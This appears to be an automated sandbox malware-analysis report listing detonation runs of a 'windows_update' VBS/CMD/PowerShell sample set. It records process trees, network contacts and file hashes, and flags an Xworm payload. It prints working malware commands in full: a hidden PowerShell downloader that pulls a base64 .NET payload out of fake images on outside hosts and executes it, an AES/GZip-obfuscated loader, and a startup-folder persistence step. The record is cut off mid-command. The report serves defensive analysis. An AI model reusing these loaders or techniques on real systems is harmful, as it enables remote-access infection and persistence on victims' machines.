| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2176 wrote to memory of 2568 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2176 wrote to memory of 2568 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2176 wrote to memory of 2568 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.Acddgoi/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 172.67.203.108:443 | nanoshield.pro | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WN54W9QYDH7SV6P2RPM7.temp
| MD5 | e54a3dae0ebf5e9a1a83f9349e73d978 |
| SHA1 | d482945d5f50abbd8fc26ec617de0aa2ca75507d |
| SHA256 | 21d8f68917b146ca3407b74ab7f62afa33652d52c667b5ec664310fe5de19aee |
| SHA512 | ae9a0ff56cc39a5d768ce747bc181e59b86c53d21d3bd8e614d42cbcb029446f4cf59ecfd9b5b678e71b58db4bc5e9af3c667bd9f2ed71b418fd7d6808a67c7f |
memory/2568-10-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2440-17-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2440-18-0x0000000002650000-0x00000000026D0000-memory.dmp
memory/2440-19-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2440-21-0x0000000002650000-0x00000000026D0000-memory.dmp
memory/2440-20-0x0000000002650000-0x00000000026D0000-memory.dmp
memory/2568-22-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2568-23-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2568-24-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2568-25-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2440-26-0x000000001AAB0000-0x000000001AAFE000-memory.dmp
memory/2440-27-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2568-28-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2568-29-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1
Network
Files
memory/3068-4-0x000000001B2B0000-0x000000001B592000-memory.dmp
memory/3068-6-0x000007FEF5990000-0x000007FEF632D000-memory.dmp
memory/3068-5-0x00000000024D0000-0x00000000024D8000-memory.dmp
memory/3068-7-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-8-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-9-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-10-0x000007FEF5990000-0x000007FEF632D000-memory.dmp
memory/3068-11-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-12-0x000007FEF5990000-0x000007FEF632D000-memory.dmp
memory/3068-13-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-14-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-15-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-16-0x000007FEF5990000-0x000007FEF632D000-memory.dmp
memory/3068-17-0x0000000002660000-0x00000000026E0000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
146s
Max time network
124s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1
Network
Files
memory/2104-4-0x000000001B390000-0x000000001B672000-memory.dmp
memory/2104-5-0x00000000023E0000-0x00000000023E8000-memory.dmp
memory/2104-6-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
memory/2104-7-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
memory/2104-9-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-8-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-10-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-11-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
memory/2104-13-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-14-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-15-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-16-0x0000000002260000-0x00000000022E0000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
159s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd';$MZYP='MadRzGindRzGModdRzGuldRzGedRzG'.Replace('dRzG', ''),'ChQdTpaQdTpngQdTpeEQdTpxteQdTpnsiQdTponQdTp'.Replace('QdTp', ''),'FGJZSroGJZSmBGJZSasGJZSeGJZS6GJZS4GJZSStrGJZSinGJZSgGJZS'.Replace('GJZS', ''),'GfsYwetfsYwCfsYwurfsYwrfsYwentfsYwProfsYwcefsYwssfsYw'.Replace('fsYw', ''),'ElPbFUePbFUmPbFUenPbFUtPbFUAtPbFU'.Replace('PbFU', ''),'InvEnKDoEnKDkeEnKD'.Replace('EnKD', ''),'Decnyejomnyejprnyejenyejssnyej'.Replace('nyej', ''),'LoaCsUjdCsUj'.Replace('CsUj', ''),'SXMnypliXMnytXMny'.Replace('XMny', ''),'ReYChsadYChsLinYChsesYChs'.Replace('YChs', ''),'TraTpWrnsTpWrfoTpWrrmTpWrFinTpWralTpWrBlTpWrockTpWr'.Replace('TpWr', ''),'CrjagKeajagKtjagKeDejagKcrjagKyjagKpjagKtorjagK'.Replace('jagK', ''),'EqqjYnqqjYtryqqjYPoiqqjYntqqjY'.Replace('qqjY', ''),'CCMrToCMrTpCMrTyToCMrT'.Replace('CMrT', '');powershell -w hidden;function lezXx($vAHtD){$fMpHn=[System.Security.Cryptography.Aes]::Create();$fMpHn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fMpHn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fMpHn.Key=[System.Convert]::($MZYP[2])('Vz0NaMXoskkNfAZDSYL9QEs4+Pg8xizh89PafV/0IEc=');$fMpHn.IV=[System.Convert]::($MZYP[2])('YYQFWZml9Xmr8vgNBAedtQ==');$LBVjX=$fMpHn.($MZYP[11])();$OrsvL=$LBVjX.($MZYP[10])($vAHtD,0,$vAHtD.Length);$LBVjX.Dispose();$fMpHn.Dispose();$OrsvL;}function UqmQx($vAHtD){$YXBBI=New-Object System.IO.MemoryStream(,$vAHtD);$DXQeR=New-Object System.IO.MemoryStream;$GSEpw=New-Object System.IO.Compression.GZipStream($YXBBI,[IO.Compression.CompressionMode]::($MZYP[6]));$GSEpw.($MZYP[13])($DXQeR);$GSEpw.Dispose();$YXBBI.Dispose();$DXQeR.Dispose();$DXQeR.ToArray();}$GbEwM=[System.IO.File]::($MZYP[9])([Console]::Title);$PQord=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 5).Substring(2))));$GigRn=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 
6).Substring(2))));[System.Reflection.Assembly]::($MZYP[7])([byte[]]$GigRn).($MZYP[12]).($MZYP[5])($null,$null);[System.Reflection.Assembly]::($MZYP[7])([byte[]]$PQord).($MZYP[12]).($MZYP[5])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1400 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vbdsg.duckdns.org | udp |
| GB | 57.128.155.22:8896 | vbdsg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.178.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qq2ufdci.hzq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3132-9-0x0000019A34E90000-0x0000019A34EB2000-memory.dmp
memory/3132-10-0x00007FF97B670000-0x00007FF97C131000-memory.dmp
memory/3132-12-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-11-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-13-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-14-0x0000019A352A0000-0x0000019A352E4000-memory.dmp
memory/3132-15-0x0000019A35370000-0x0000019A353E6000-memory.dmp
memory/2184-22-0x00007FF97B670000-0x00007FF97C131000-memory.dmp
memory/2184-23-0x00000228689B0000-0x00000228689C0000-memory.dmp
memory/2184-27-0x00000228689B0000-0x00000228689C0000-memory.dmp
memory/3132-28-0x00007FF97B670000-0x00007FF97C131000-memory.dmp
memory/2184-31-0x00007FF97B670000-0x00007FF97C131000-memory.dmp
memory/3132-33-0x0000019A35250000-0x0000019A35264000-memory.dmp
memory/3132-34-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp
memory/3132-35-0x00007FF999B20000-0x00007FF999BDE000-memory.dmp
memory/3132-36-0x0000019A35260000-0x0000019A3526C000-memory.dmp
memory/3132-37-0x0000019A35270000-0x0000019A35280000-memory.dmp
memory/3132-38-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-39-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-40-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
134s
Max time network
137s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3152 wrote to memory of 4140 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3152 wrote to memory of 4140 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4140 wrote to memory of 3304 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4140 wrote to memory of 3304 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3304 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3304 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.dkmmIhF/selif/orp.dleihsonan//:sptth', '1', 'Music'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.40.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 172.67.203.108:443 | nanoshield.pro | tcp |
| US | 8.8.8.8:53 | 108.203.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dcx5rz30.v4i.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4140-9-0x00000151F7600000-0x00000151F7622000-memory.dmp
memory/4140-10-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
memory/4140-11-0x00000151DCF40000-0x00000151DCF50000-memory.dmp
memory/4140-12-0x00000151DCF40000-0x00000151DCF50000-memory.dmp
memory/3304-13-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
memory/3304-23-0x000002C5CDD00000-0x000002C5CDD10000-memory.dmp
memory/3304-24-0x000002C5CD840000-0x000002C5CD88E000-memory.dmp
memory/4136-26-0x000001F8A1DF0000-0x000001F8A1E00000-memory.dmp
memory/4136-25-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
memory/4136-42-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
memory/3304-43-0x000002C5CDD00000-0x000002C5CDD10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7c0e589f91d9ceee1b937d2bb3381dab |
| SHA1 | 1fcdf3e9a0888cf23edb5fa6b2e89ff99b9a6a93 |
| SHA256 | b6d1df24d29cf8b985fccb7bb79bcead5bd6cc068b3bc2c8701230baa59b034a |
| SHA512 | 65b299281626acfe988b11903072bda49f72003d4186b8e6b6971b1bca4a261e749b91588e139898a26eceb01a56d2a72a5fd2c8f5b78e71a9d54f9359cbe310 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
memory/3304-47-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 50a8221b93fbd2628ac460dd408a9fc1 |
| SHA1 | 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6 |
| SHA256 | 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e |
| SHA512 | 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0 |
memory/4140-50-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240319-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd';$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),'LoTzLuadTzLu'.Replace('TzLu', ''),'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),'CofgggpyfgggTofggg'.Replace('fggg', ''),'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');powershell -w hidden;function 